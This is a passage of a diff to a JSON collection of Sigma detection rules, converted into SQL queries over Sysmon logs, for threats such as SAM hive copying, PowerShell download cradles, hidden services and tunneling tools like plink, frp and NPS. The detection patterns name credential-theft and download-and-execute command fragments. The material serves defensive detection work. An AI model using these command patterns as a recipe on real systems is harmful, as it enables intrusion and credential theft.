Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" - ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" - }, - { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", - "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "attack.command_and_control", + "attack.t1090" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" - }, - { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Unknown" + "Administrative scripts." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "status": "experimental", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Suspicious aspnet_compiler.exe Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", + "status": "experimental", + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate scripts located on other partitions such as \"D:\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1219" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR Image LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], 